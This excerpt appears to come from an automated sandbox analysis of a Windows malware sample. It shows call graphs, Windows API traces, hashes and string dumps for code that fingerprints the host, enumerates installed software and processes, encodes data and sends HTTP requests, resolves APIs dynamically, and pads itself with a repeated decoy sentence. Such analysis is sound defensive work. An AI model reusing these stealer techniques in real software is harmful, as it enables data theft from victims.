15114->15115 15116 1da8a0 lstrcpy 15115->15116 15117 1d1f9c 15116->15117 15118 1da9b0 4 API calls 15117->15118 15119 1d1fc6 15118->15119 15120 1da8a0 lstrcpy 15119->15120 15121 1d1fcf 15120->15121 15122 1da9b0 4 API calls 15121->15122 15123 1d1fef 15122->15123 15124 1da8a0 lstrcpy 15123->15124 15125 1d1ff8 15124->15125 15749 1d7d80 GetSystemPowerStatus 15125->15749 15128 1da9b0 4 API calls 15129 1d2018 15128->15129 15130 1da8a0 lstrcpy 15129->15130 15131 1d2021 15130->15131 15132 1da9b0 4 API calls 15131->15132 15133 1d2040 15132->15133 15134 1da8a0 lstrcpy 15133->15134 15135 1d2049 15134->15135 15136 1da9b0 4 API calls 15135->15136 15137 1d206a 15136->15137 15138 1da8a0 lstrcpy 15137->15138 15139 1d2073 15138->15139 15140 1d207e GetCurrentProcessId 15139->15140 15751 1d9470 OpenProcess 15140->15751 15143 1da920 3 API calls 15144 1d20a4 15143->15144 15145 1da8a0 lstrcpy 15144->15145 15146 1d20ad 15145->15146 15147 1da9b0 4 API calls 15146->15147 15148 1d20d7 15147->15148 15149 1da8a0 lstrcpy 15148->15149 15150 1d20e0 15149->15150 15151 1da9b0 4 API calls 15150->15151 15152 1d2100 15151->15152 15153 1da8a0 lstrcpy 15152->15153 15154 1d2109 15153->15154 15756 1d7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15154->15756 15157 1da9b0 4 API calls 15158 1d2129 15157->15158 15159 1da8a0 lstrcpy 15158->15159 15160 1d2132 15159->15160 15161 1da9b0 4 API calls 15160->15161 15162 1d2151 15161->15162 15163 1da8a0 lstrcpy 15162->15163 15164 1d215a 15163->15164 15165 1da9b0 4 API calls 15164->15165 15166 1d217b 15165->15166 15167 1da8a0 lstrcpy 15166->15167 15168 1d2184 15167->15168 15760 1d7f60 15168->15760 15171 1da9b0 4 API calls 15172 1d21a4 15171->15172 15173 1da8a0 lstrcpy 15172->15173 15174 1d21ad 15173->15174 15175 1da9b0 4 API calls 15174->15175 15176 1d21cc 15175->15176 15177 1da8a0 lstrcpy 15176->15177 15178 1d21d5 15177->15178 15179 1da9b0 4 API calls 15178->15179 15180 1d21f6 15179->15180 15181 1da8a0 lstrcpy 15180->15181 15182 1d21ff 15181->15182 15773 1d7ed0 GetSystemInfo wsprintfA 15182->15773 15185 1da9b0 4 API calls 15186 1d221f 15185->15186 15187 1da8a0 lstrcpy 15186->15187 15188 1d2228 15187->15188 15189 1da9b0 4 API calls 15188->15189 15190 1d2247 15189->15190 15191 1da8a0 lstrcpy 15190->15191 15192 1d2250 15191->15192 15193 1da9b0 4 API calls 15192->15193 15194 1d2270 15193->15194 15195 1da8a0 lstrcpy 15194->15195 15196 1d2279 15195->15196 15775 1d8100 GetProcessHeap RtlAllocateHeap 15196->15775 15199 1da9b0 4 API calls 15200 1d2299 15199->15200 15201 1da8a0 lstrcpy 15200->15201 15202 1d22a2 15201->15202 15203 1da9b0 4 API calls 15202->15203 15204 1d22c1 15203->15204 15205 1da8a0 lstrcpy 15204->15205 15206 1d22ca 15205->15206 15207 1da9b0 4 API calls 15206->15207 15208 1d22eb 15207->15208 15209 1da8a0 lstrcpy 15208->15209 15210 1d22f4 15209->15210 15781 1d87c0 15210->15781 15213 1da920 3 API calls 15214 1d231e 15213->15214 15215 1da8a0 lstrcpy 15214->15215 15216 1d2327 15215->15216 15217 1da9b0 4 API calls 15216->15217 15218 1d2351 15217->15218 15219 1da8a0 lstrcpy 15218->15219 15220 1d235a 15219->15220 15221 1da9b0 4 API calls 15220->15221 15222 1d237a 15221->15222 15223 1da8a0 lstrcpy 15222->15223 15224 1d2383 15223->15224 15225 1da9b0 4 API calls 15224->15225 15226 1d23a2 15225->15226 15227 1da8a0 lstrcpy 15226->15227 15228 1d23ab 15227->15228 15786 1d81f0 15228->15786 15230 1d23c2 15231 1da920 3 API calls 15230->15231 15232 1d23d5 15231->15232 15233 1da8a0 lstrcpy 15232->15233 15234 1d23de 15233->15234 15235 1da9b0 4 API calls 15234->15235 15236 1d240a 15235->15236 15237 1da8a0 lstrcpy 15236->15237 15238 1d2413 15237->15238 15239 1da9b0 4 API calls 15238->15239 15240 1d2432 15239->15240 15241 1da8a0 lstrcpy 15240->15241 15242 1d243b 15241->15242 15243 1da9b0 4 API calls 15242->15243 15244 1d245c 15243->15244 15245 1da8a0 lstrcpy 15244->15245 15246 1d2465 15245->15246 15247 1da9b0 4 API calls 15246->15247 15248 1d2484 15247->15248 15249 1da8a0 lstrcpy 15248->15249 15250 1d248d 15249->15250 15251 1da9b0 4 API calls 15250->15251 15252 1d24ae 15251->15252 15253 1da8a0 lstrcpy 15252->15253 15254 1d24b7 15253->15254 15794 1d8320 15254->15794 15256 1d24d3 15257 1da920 3 API calls 15256->15257 15258 1d24e6 15257->15258 15259 1da8a0 lstrcpy 15258->15259 15260 1d24ef 15259->15260 15261 1da9b0 4 API calls 15260->15261 15262 1d2519 15261->15262 15263 1da8a0 lstrcpy 15262->15263 15264 1d2522 15263->15264 15265 1da9b0 4 API calls 15264->15265 15266 1d2543 15265->15266 15267 1da8a0 lstrcpy 15266->15267 15268 1d254c 15267->15268 15269 1d8320 17 API calls 15268->15269 15270 1d2568 15269->15270 15271 1da920 3 API calls 15270->15271 15272 1d257b 15271->15272 15273 1da8a0 lstrcpy 15272->15273 15274 1d2584 15273->15274 15275 1da9b0 4 API calls 15274->15275 15276 1d25ae 15275->15276 15277 1da8a0 lstrcpy 15276->15277 15278 1d25b7 15277->15278 15279 1da9b0 4 API calls 15278->15279 15280 1d25d6 15279->15280 15281 1da8a0 lstrcpy 15280->15281 15282 1d25df 15281->15282 15283 1da9b0 4 API calls 15282->15283 15284 1d2600 15283->15284 15285 1da8a0 lstrcpy 15284->15285 15286 1d2609 15285->15286 15830 1d8680 15286->15830 15288 1d2620 15289 1da920 3 API calls 15288->15289 15290 1d2633 15289->15290 15291 1da8a0 lstrcpy 15290->15291 15292 1d263c 15291->15292 15293 1d265a lstrlen 15292->15293 15294 1d266a 15293->15294 15295 1da740 lstrcpy 15294->15295 15296 1d267c 15295->15296 15297 1c1590 lstrcpy 15296->15297 15298 1d268d 15297->15298 15840 1d5190 15298->15840 15300 1d2699 15300->13732 16028 1daad0 15301->16028 15303 1c5009 InternetOpenUrlA 15307 1c5021 15303->15307 15304 1c502a InternetReadFile 15304->15307 15305 1c50a0 InternetCloseHandle InternetCloseHandle 15306 1c50ec 15305->15306 15306->13736 15307->15304 15307->15305 16029 1c98d0 15308->16029 15310 1d0759 15311 1d077d 15310->15311 15312 1d0a38 15310->15312 15315 1d0799 StrCmpCA 15311->15315 15313 1c1590 lstrcpy 15312->15313 15314 1d0a49 15313->15314 16205 1d0250 15314->16205 15317 1d07a8 15315->15317 15342 1d0843 15315->15342 15319 1da7a0 lstrcpy 15317->15319 15321 1d07c3 15319->15321 15320 1d0865 StrCmpCA 15322 1d0874 15320->15322 15360 1d096b 15320->15360 15323 1c1590 lstrcpy 15321->15323 15324 1da740 lstrcpy 15322->15324 15325 1d080c 15323->15325 15327 1d0881 15324->15327 15328 1da7a0 lstrcpy 15325->15328 15326 1d099c StrCmpCA 15329 1d09ab 15326->15329 15330 1d0a2d 15326->15330 15331 1da9b0 4 API calls 15327->15331 15332 1d0823 15328->15332 15333 1c1590 lstrcpy 15329->15333 15330->13740 15334 1d08ac 15331->15334 15335 1da7a0 lstrcpy 15332->15335 15336 1d09f4 15333->15336 15337 1da920 3 API calls 15334->15337 15338 1d083e 15335->15338 15340 1da7a0 lstrcpy 15336->15340 15341 1d08b3 15337->15341 16032 1cfb00 15338->16032 15343 1d0a0d 15340->15343 15344 1da9b0 4 API calls 15341->15344 15342->15320 15345 1da7a0 lstrcpy 15343->15345 15346 1d08ba 15344->15346 15347 1d0a28 15345->15347 15348 1da8a0 lstrcpy 15346->15348 16148 1d0030 15347->16148 15360->15326 15680 1da7a0 lstrcpy 15679->15680 15681 1c1683 15680->15681 15682 1da7a0 lstrcpy 15681->15682 15683 1c1695 15682->15683 15684 1da7a0 lstrcpy 15683->15684 15685 1c16a7 15684->15685 15686 1da7a0 lstrcpy 15685->15686 15687 1c15a3 15686->15687 15687->14563 15689 1c47c6 15688->15689 15690 1c4838 lstrlen 15689->15690 15714 1daad0 15690->15714 15692 1c4848 InternetCrackUrlA 15693 1c4867 15692->15693 15693->14640 15695 1da740 lstrcpy 15694->15695 15696 1d8b74 15695->15696 15697 1da740 lstrcpy 15696->15697 15698 1d8b82 GetSystemTime 15697->15698 15699 1d8b99 15698->15699 15700 1da7a0 lstrcpy 15699->15700 15701 1d8bfc 15700->15701 15701->14655 15703 1da931 15702->15703 15704 1da988 15703->15704 15706 1da968 lstrcpy lstrcat 15703->15706 15705 1da7a0 lstrcpy 15704->15705 15707 1da994 15705->15707 15706->15704 15707->14658 15708->14773 15710 1c9af9 LocalAlloc 15709->15710 15711 1c4eee 15709->15711 15710->15711 15712 1c9b14 CryptStringToBinaryA 15710->15712 15711->14661 15711->14664 15712->15711 15713 1c9b39 LocalFree 15712->15713 15713->15711 15714->15692 15715->14783 15716->14924 15717->14926 15718->14934 15847 1d77a0 15719->15847 15722 1d1c1e 15722->15016 15723 1d76c6 RegOpenKeyExA 15724 1d7704 RegCloseKey 15723->15724 15725 1d76e7 RegQueryValueExA 15723->15725 15724->15722 15725->15724 15727 1d1c99 15726->15727 15727->15030 15729 1d1e09 15728->15729 15729->15072 15731 1d7a9a wsprintfA 15730->15731 15732 1d1e84 15730->15732 15731->15732 15732->15086 15734 1d7b4d 15733->15734 15735 1d1efe 15733->15735 15854 1d8d20 LocalAlloc CharToOemW 15734->15854 15735->15100 15738 1da740 lstrcpy 15737->15738 15739 1d7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15738->15739 15748 1d7c25 15739->15748 15740 1d7d18 15742 1d7d1e LocalFree 15740->15742 15743 1d7d28 15740->15743 15741 1d7c46 GetLocaleInfoA 15741->15748 15742->15743 15745 1da7a0 lstrcpy 15743->15745 15744 1da9b0 lstrcpy lstrlen lstrcpy lstrcat 15744->15748 15747 1d7d37 15745->15747 15746 1da8a0 lstrcpy 15746->15748 15747->15113 15748->15740 15748->15741 15748->15744 15748->15746 15750 1d2008 15749->15750 15750->15128 15752 1d94b5 15751->15752 15753 1d9493 GetModuleFileNameExA CloseHandle 15751->15753 15754 1da740 lstrcpy 15752->15754 15753->15752 15755 1d2091 15754->15755 15755->15143 15757 1d7e68 RegQueryValueExA 15756->15757 15758 1d2119 15756->15758 15759 1d7e8e RegCloseKey 15757->15759 15758->15157 15759->15758 15761 1d7fb9 GetLogicalProcessorInformationEx 15760->15761 15762 1d7fd8 GetLastError 15761->15762 15766 1d8029 15761->15766 15768 1d7fe3 15762->15768 15772 1d8022 15762->15772 15765 1d89f0 2 API calls 15770 1d2194 15765->15770 15767 1d89f0 2 API calls 15766->15767 15769 1d807b 15767->15769 15768->15761 15768->15770 15855 1d89f0 15768->15855 15858 1d8a10 GetProcessHeap RtlAllocateHeap 15768->15858 15771 1d8084 wsprintfA 15769->15771 15769->15772 15770->15171 15771->15770 15772->15765 15772->15770 15774 1d220f 15773->15774 15774->15185 15776 1d89b0 15775->15776 15777 1d814d GlobalMemoryStatusEx 15776->15777 15778 1d8163 15777->15778 15779 1d819b wsprintfA 15778->15779 15780 1d2289 15779->15780 15780->15199 15782 1d87fb GetProcessHeap RtlAllocateHeap wsprintfA 15781->15782 15784 1da740 lstrcpy 15782->15784 15785 1d230b 15784->15785 15785->15213 15787 1da740 lstrcpy 15786->15787 15791 1d8229 15787->15791 15788 1d8263 15790 1da7a0 lstrcpy 15788->15790 15789 1da9b0 lstrcpy lstrlen lstrcpy lstrcat 15789->15791 15792 1d82dc 15790->15792 15791->15788 15791->15789 15793 1da8a0 lstrcpy 15791->15793 15792->15230 15793->15791 15795 1da740 lstrcpy 15794->15795 15796 1d835c RegOpenKeyExA 15795->15796 15797 1d83ae 15796->15797 15798 1d83d0 15796->15798 15799 1da7a0 lstrcpy 15797->15799 15800 1d83f8 RegEnumKeyExA 15798->15800 15801 1d8613 RegCloseKey 15798->15801 15810 1d83bd 15799->15810 15802 1d843f wsprintfA RegOpenKeyExA 15800->15802 15803 1d860e 15800->15803 15804 1da7a0 lstrcpy 15801->15804 15805 1d8485 RegCloseKey RegCloseKey 15802->15805 15806 1d84c1 RegQueryValueExA 15802->15806 15803->15801 15804->15810 15807 1da7a0 lstrcpy 15805->15807 15808 1d84fa lstrlen 15806->15808 15809 1d8601 RegCloseKey 15806->15809 15807->15810 15808->15809 15811 1d8510 15808->15811 15809->15803 15810->15256 15812 1da9b0 4 API calls 15811->15812 15813 1d8527 15812->15813 15814 1da8a0 lstrcpy 15813->15814 15815 1d8533 15814->15815 15816 1da9b0 4 API calls 15815->15816 15817 1d8557 15816->15817 15818 1da8a0 lstrcpy 15817->15818 15819 1d8563 15818->15819 15820 1d856e RegQueryValueExA 15819->15820 15820->15809 15821 1d85a3 15820->15821 15822 1da9b0 4 API calls 15821->15822 15823 1d85ba 15822->15823 15824 1da8a0 lstrcpy 15823->15824 15825 1d85c6 15824->15825 15826 1da9b0 4 API calls 15825->15826 15827 1d85ea 15826->15827 15828 1da8a0 lstrcpy 15827->15828 15829 1d85f6 15828->15829 15829->15809 15831 1da740 lstrcpy 15830->15831 15832 1d86bc CreateToolhelp32Snapshot Process32First 15831->15832 15833 1d875d CloseHandle 15832->15833 15834 1d86e8 Process32Next 15832->15834 15835 1da7a0 lstrcpy 15833->15835 15834->15833 15839 1d86fd 15834->15839 15838 1d8776 15835->15838 15836 1da9b0 lstrcpy lstrlen lstrcpy lstrcat 15836->15839 15837 1da8a0 lstrcpy 15837->15839 15838->15288 15839->15834 15839->15836 15839->15837 15841 1da7a0 lstrcpy 15840->15841 15842 1d51b5 15841->15842 15843 1c1590 lstrcpy 15842->15843 15844 1d51c6 15843->15844 15859 1c5100 15844->15859 15846 1d51cf 15846->15300 15850 1d7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15847->15850 15849 1d76b9 15849->15722 15849->15723 15851 1d7765 RegQueryValueExA 15850->15851 15852 1d7780 RegCloseKey 15850->15852 15851->15852 15853 1d7793 15852->15853 15853->15849 15854->15735 15856 1d8a0c 15855->15856 15857 1d89f9 GetProcessHeap HeapFree 15855->15857 15856->15768 15857->15856 15858->15768 15860 1da7a0 lstrcpy 15859->15860 15861 1c5119 15860->15861 15862 1c47b0 2 API calls 15861->15862 15863 1c5125 15862->15863 16019 1d8ea0 15863->16019 15865 1c5184 15866 1c5192 lstrlen 15865->15866 15867 1c51a5 15866->15867 15868 1d8ea0 4 API calls 15867->15868 15869 1c51b6 15868->15869 15870 1da740 lstrcpy 15869->15870 15871 1c51c9 15870->15871 15872 1da740 lstrcpy 15871->15872 15873 1c51d6 15872->15873 15874 1da740 lstrcpy 15873->15874 15875 1c51e3 15874->15875 15876 1da740 lstrcpy 15875->15876 15877 1c51f0 15876->15877 15878 1da740 lstrcpy 15877->15878 15879 1c51fd InternetOpenA StrCmpCA 15878->15879 15880 1c522f 15879->15880 15881 1c58c4 InternetCloseHandle 15880->15881 15882 1d8b60 3 API calls 15880->15882 15888 1c58d9 ctype 15881->15888 15883 1c524e 15882->15883 15884 1da920 3 API calls 15883->15884 15885 1c5261 15884->15885 15886 1da8a0 lstrcpy 15885->15886 15887 1c526a 15886->15887 15889 1da9b0 4 API calls 15887->15889 15892 1da7a0 lstrcpy 15888->15892 15890 1c52ab 15889->15890 15891 1da920 3 API calls 15890->15891 15893 1c52b2 15891->15893 15899 1c5913 15892->15899 15894 1da9b0 4 API calls 15893->15894 15895 1c52b9 15894->15895 15896 1da8a0 lstrcpy 15895->15896 15897 1c52c2 15896->15897 15898 1da9b0 4 API calls 15897->15898 15900 1c5303 15898->15900 15899->15846 15901 1da920 3 API calls 15900->15901 15902 1c530a 15901->15902 15903 1da8a0 lstrcpy 15902->15903 15904 1c5313 15903->15904 15905 1c5329 InternetConnectA 15904->15905 15905->15881 15906 1c5359 HttpOpenRequestA 15905->15906 15908 1c58b7 InternetCloseHandle 15906->15908 15909 1c53b7 15906->15909 15908->15881 15910 1da9b0 4 API calls 15909->15910 15911 1c53cb 15910->15911 15912 1da8a0 lstrcpy 15911->15912 15913 1c53d4 15912->15913 15914 1da920 3 API calls 15913->15914 15915 1c53f2 15914->15915 15916 1da8a0 lstrcpy 15915->15916 15917 1c53fb 15916->15917 15918 1da9b0 4 API calls 15917->15918 15919 1c541a 15918->15919 15920 1da8a0 lstrcpy 15919->15920 15921 1c5423 15920->15921 15922 1da9b0 4 API calls 15921->15922 15923 1c5444 15922->15923 15924 1da8a0 lstrcpy 15923->15924 15925 1c544d 15924->15925 15926 1da9b0 4 API calls 15925->15926 15927 1c546e 15926->15927 15928 1da8a0 lstrcpy 15927->15928 16020 1d8ead CryptBinaryToStringA 16019->16020 16021 1d8ea9 16019->16021 16020->16021 16022 1d8ece GetProcessHeap RtlAllocateHeap 16020->16022 16021->15865 16022->16021 16023 1d8ef4 ctype 16022->16023 16024 1d8f05 CryptBinaryToStringA 16023->16024 16024->16021 16028->15303 16271 1c9880 16029->16271 16031 1c98e1 16031->15310 16033 1da740 lstrcpy 16032->16033 16034 1cfb16 16033->16034 16309 1d8de0 16034->16309 16206 1da740 lstrcpy 16205->16206 16207 1d0266 16206->16207 16208 1d8de0 2 API calls 16207->16208 16209 1d027b 16208->16209 16210 1da920 3 API calls 16209->16210 16211 1d028b 16210->16211 16212 1da8a0 lstrcpy 16211->16212 16213 1d0294 16212->16213 16214 1da9b0 4 API calls 16213->16214 16215 1d02b8 16214->16215 16272 1c988e 16271->16272 16275 1c6fb0 16272->16275 16274 1c98ad ctype 16274->16031 16278 1c6d40 16275->16278 16279 1c6d63 16278->16279 16289 1c6d59 16278->16289 16279->16289 16292 1c6660 16279->16292 16281 1c6dbe 16281->16289 16298 1c69b0 16281->16298 16283 1c6e2a 16284 1c6ee6 VirtualFree 16283->16284 16285 1c6ef7 16283->16285 16283->16289 16284->16285 16287 1c6f38 16285->16287 16288 1c6f26 FreeLibrary 16285->16288 16291 1c6f41 16285->16291 16286 1d89f0 2 API calls 16286->16289 16290 1d89f0 2 API calls 16287->16290 16288->16285 16289->16274 16290->16291 16291->16286 16291->16289 16297 1c668f VirtualAlloc 16292->16297 16294 1c6730 16295 1c6743 VirtualAlloc 16294->16295 16296 1c673c 16294->16296 16295->16296 16296->16281 16297->16294 16297->16296 16299 1c69c9 16298->16299 16303 1c69d5 16298->16303 16300 1c6a09 LoadLibraryA 16299->16300 16299->16303 16301 1c6a32 16300->16301 16300->16303 16305 1c6ae0 16301->16305 16308 1d8a10 GetProcessHeap RtlAllocateHeap 16301->16308 16303->16283 16304 1c6ba8 GetProcAddress 16304->16303 16304->16305 16305->16303 16305->16304 16306 1d89f0 2 API calls 16306->16305 16307 1c6a8b 16307->16303 16307->16306 16308->16307

                      Executed Functions

                      Function 001D9860 Relevance: 86.0, APIs: 33, Strings: 16, Instructions: 212libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 660 1d9860-1d9874 call 1d9750 663 1d987a-1d9a8e call 1d9780 GetProcAddress * 21 660->663 664 1d9a93-1d9af2 LoadLibraryA * 5 660->664 663->664 666 1d9b0d-1d9b14 664->666 667 1d9af4-1d9b08 GetProcAddress 664->667 668 1d9b46-1d9b4d 666->668 669 1d9b16-1d9b41 GetProcAddress * 2 666->669 667->666 671 1d9b4f-1d9b63 GetProcAddress 668->671 672 1d9b68-1d9b6f 668->672 669->668 671->672 673 1d9b89-1d9b90 672->673 674 1d9b71-1d9b84 GetProcAddress 672->674 675 1d9bc1-1d9bc2 673->675 676 1d9b92-1d9bbc GetProcAddress * 2 673->676 674->673 676->675
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 001D98A1
                      • GetProcAddress.KERNEL32(74DD0000,00E32368), ref: 001D98BA
                      • GetProcAddress.KERNEL32(74DD0000,00E32170), ref: 001D98D2
                      • GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 001D98EA
                      • GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 001D9903
                      • GetProcAddress.KERNEL32(74DD0000,00E38FA0), ref: 001D991B
                      • GetProcAddress.KERNEL32(74DD0000,00E258F0), ref: 001D9933
                      • GetProcAddress.KERNEL32(74DD0000,00E25870), ref: 001D994C
                      • GetProcAddress.KERNEL32(74DD0000,00E32338), ref: 001D9964
                      • GetProcAddress.KERNEL32(74DD0000,00E32398), ref: 001D997C
                      • GetProcAddress.KERNEL32(74DD0000,00E32380), ref: 001D9995
                      • GetProcAddress.KERNEL32(74DD0000,00E323E0), ref: 001D99AD
                      • GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 001D99C5
                      • GetProcAddress.KERNEL32(74DD0000,00E323F8), ref: 001D99DE
                      • GetProcAddress.KERNEL32(74DD0000,00E32410), ref: 001D99F6
                      • GetProcAddress.KERNEL32(74DD0000,00E256B0), ref: 001D9A0E
                      • GetProcAddress.KERNEL32(74DD0000,00E32428), ref: 001D9A27
                      • GetProcAddress.KERNEL32(74DD0000,00E32458), ref: 001D9A3F
                      • GetProcAddress.KERNEL32(74DD0000,00E25810), ref: 001D9A57
                      • GetProcAddress.KERNEL32(74DD0000,00E32188), ref: 001D9A70
                      • GetProcAddress.KERNEL32(74DD0000,00E25670), ref: 001D9A88
                      • LoadLibraryA.KERNEL32(00E321A0,?,001D6A00), ref: 001D9A9A
                      • LoadLibraryA.KERNEL32(00E321D0,?,001D6A00), ref: 001D9AAB
                      • LoadLibraryA.KERNEL32(00E321B8,?,001D6A00), ref: 001D9ABD
                      • LoadLibraryA.KERNEL32(00E32200,?,001D6A00), ref: 001D9ACF
                      • LoadLibraryA.KERNEL32(00E32260,?,001D6A00), ref: 001D9AE0
                      • GetProcAddress.KERNEL32(75A70000,00E32230), ref: 001D9B02
                      • GetProcAddress.KERNEL32(75290000,00E32248), ref: 001D9B23
                      • GetProcAddress.KERNEL32(75290000,00E32278), ref: 001D9B3B
                      • GetProcAddress.KERNEL32(75BD0000,00E32290), ref: 001D9B5D
                      • GetProcAddress.KERNEL32(75450000,00E25970), ref: 001D9B7E
                      • GetProcAddress.KERNEL32(76E90000,00E38F60), ref: 001D9B9F
                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 001D9BB6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: #$($$0"$8#$@$$H"$NtQueryInformationProcess$X$$`"$h#$p!$pV$pX$pY$x"$#
                      • API String ID: 2238633743-2620304504
                      • Opcode ID: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                      • Instruction ID: fccb3a82c38195e7210a6b9f0efa5573c060493838ed285e558975015b4c5420
                      • Opcode Fuzzy Hash: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                      • Instruction Fuzzy Hash: ECA16CB6510340AFD344EFA8FF88A6677F9F78C301704C53AA605E3264D7399865CB5A
                      Function 001C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 764 1c45c0-1c4695 RtlAllocateHeap 781 1c46a0-1c46a6 764->781 782 1c46ac-1c474a 781->782 783 1c474f-1c47a9 VirtualProtect 781->783 782->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C460E
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001C479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46C2
